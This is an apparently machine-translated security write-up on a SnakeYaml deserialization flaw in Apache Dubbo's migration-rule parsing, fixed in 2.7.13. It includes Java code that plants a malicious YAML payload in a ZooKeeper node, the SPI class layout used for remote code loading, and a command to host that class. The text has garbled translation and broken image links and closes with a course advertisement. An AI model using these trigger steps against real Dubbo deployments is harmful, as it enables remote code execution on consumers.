01 Vulnerability Background
The reason for discovering this vulnerability is that when analyzing the script injection patch of CVE-2021-30181, I accidentally discovered several yaml deserialization
vulnerabilities that have been fixed. I thought it was an undisclosed Nday. After querying, I found that it actually corresponds to Fix code for the CVE-2021-30180 vulnerability. By looking at the patch, we can know that
all yaml.load calls in the Router module use the SafeConstructor whitelist filter, which cannot be used normally.
"For the knowledge about SnakeYaml deserialization in this article, you can refer to the tweet sent before the official account - "Java
SnakeYaml deserialization analysis" ".
[External link picture transfer failed, the source site may have an anti-theft link mechanism, it is recommended to save the picture and upload it directly (img-7FScAdFj-1690358271307)(https://image.3001.net/images/20220415/1649992906_6258e4caa0ed5214712f1.png!small ?1649992909028)]
Search for the call of yaml.load in the code, and found that there is another module called, and the repair measures such as SafeConstructor are not used. The location of the vulnerable code is as follows: public class MigrationRule {private static final String DUBBO_SERVICEDISCOVERY_MIGRATION_KEY = “dubbo.application.service -discovery.migration”; public static final String DUBBO_SERVICEDISCOVERY_MIGRATION_GROUP = “MIGRATION”; public static final String RULE_KEY = ApplicationModel.getName() + “.migration”;private static DynamicConfiguration configuration = null;private String key;priv ate MigrationStep step;...public static MigrationRule parse(String rawRule) {if (null == configuration) {return getMigrationRule((String)null);} else if (!StringUtils.isBlank(rawRule) && !“INIT”.equals(rawRule)) {Constructor constructor = new Constructor(MigrationRule.class);Yaml yaml = new Yaml(constructor);return (MigrationRule)yaml.load(rawRule);} else {String step = (String)configuration.getInternalProperty(“dubbo.application.service-discovery.migration”);return getMigrationRule(step);}}…}
Therefore, the PoC of CVE-2021-30180 can also be exploited here. The specific deserialization exploit chain has been released by Github Security Lab. Interested students can refer to the exploit
chain for modifying the CVE-2021-36162 vulnerability.
## 02 Vulnerability trigger
With the yaml deserialization exploit chain, the next step is to see how to trigger this vulnerability. Referring to the previous vulnerability trigger method, the trigger needs to be
completed by adding nodes to deposit malicious data on ZooKeeper (hereinafter abbreviated as ZK), so there are two problems to be solved:
1. In which node of ZK add malicious yaml data?
2. How to let consumers read and parse this yaml data?
Question one
By searching the Migation function, you can find the following documents. Dubbo uses this function to control consumers to implement different location selection strategies. According to the content, it can be roughly determined that malicious data can be controlled through the global configuration center ZK
.
Run the consumer and server normally and capture packets, you can find that it contains the ZK Path related to migration, try to create related nodes in it, and insert arbitrary data in the following paths:
question two
After completing the insertion of arbitrary data, run the consumer again and find the error message of the following parsing exception , which proves that the inserted data has taken effect and successfully entered the vulnerable code.
Try to insert the constructed PoC into the above path. Here you will find that there are many spaces, special symbols and other characters in the PoC. Inserting the PoC directly through ZKCli.sh will cause various problems, resulting in the vulnerability not being triggered normally
. , so it is necessary to add data to ZK by calling a third-party package through Java. The specific code is as follows:
• Use the following code to insert malicious Yaml data // Insert logic implemented by yourself before seeing the official github insertion code public class RegisterYaml {public static void main(String[] args) throws Exception {String path = “/dubbo/config/MIGRATION /consumer-of-helloworld-app.migration”;String poc = “…”;RetryPolicy retryPolicy = new ExponentialBackoffRetry(1000,3);CuratorFramework client = CuratorFrameworkFactory.newClient(“127.0.0.1:2181”, retryPolicy);client. start();Stat stat = client.checkExists().forPath(path);if (stat != null) {client.delete().forPath(path);}client.create().forPath(path, poc. getBytes());}}
Just prepare the SPI configuration file needed to trigger the vulnerability and the Class bytecode file to be executed. The specific file directory structure is as follows: ├── META-INF│ └── services│ └── javax.script .ScriptEngineFactory└── cc└── m01n└── SnakeYaml└── AwesomeScriptEngineFactory.class
Start the HTTP Server with Python in the same directory as META-INF.
• python3 -m http.server 8000
Start the server code first, and then run the consumer code to trigger the vulnerability:
[External link picture transfer failed, the source site may have an anti-theft link mechanism, it is recommended to save the picture and upload it directly (img-6uUpwYcf-1690358271309)(https://image.3001.net/images/20220415/1649993058_6258e562e93d68aeeff06.png!small ?1649993060762)][External link picture transfer failed, the source site may have an anti-leeching mechanism, it is recommended to save the picture and upload it directly (img-CXiC7wLf-1690358271309)(https://image.3001.net/images/20220415/1649993066_6258e56a40b553f9e16 29 .png!small?1649993068623)]
## 03 Vulnerability Analysis
Set a breakpoint in the MigrationRuleListener class, which will call this.configuration.getConfig to get the yaml data from ZK
to the rawRule attribute, and you can see that the malicious yaml data we wrote is taken out.
Continue to follow up and find that the MigrationRuleListener instance is created through the custom SPI ExtensionLoader#createExtension.
[External link picture transfer failed, the source site may have an anti-theft link mechanism, it is recommended to save the picture and upload it directly (img-zdwBAnWl-1690358271310)(https://image.3001.net/images/20220415/1649993089_6258e58188c3902dfb023.png!small ?1649993091407)]
Later, the onRefer method will be called on the MigrationRuleListener instance to trigger the subsequent yaml data parsing operation.
Going into the breakpoint and following up, you can see that the yaml data in rawRule will be passed into the yaml.load method, resulting in a deserialization vulnerability.
## 04 Bug fixes
This vulnerability has been repaired in version 2.7.13. The repair method
is the same as CVE-2021-30180, and SafeConstructor is used to repair it. The specific repair patch is as follows:
https://github.com/apache/dubbo/commit/bfa4b3bb6660d404c0715f54f8743dda45b46909
b3bb6660d404c0715f54f8743dda45b46909
[External link image transfer...(img-NbK0tKMS-1690358271310)]
Network security engineer enterprise-level learning route
At this time, of course you need a systematic learning route
If the picture is too large and compressed by the platform, you can download it at the end of the article (free of charge), and you can also learn and communicate together.
Some of my collection of self-study primers on cyber security
Some good video tutorials I got for free:
The above information [click the card below] can be received, free to share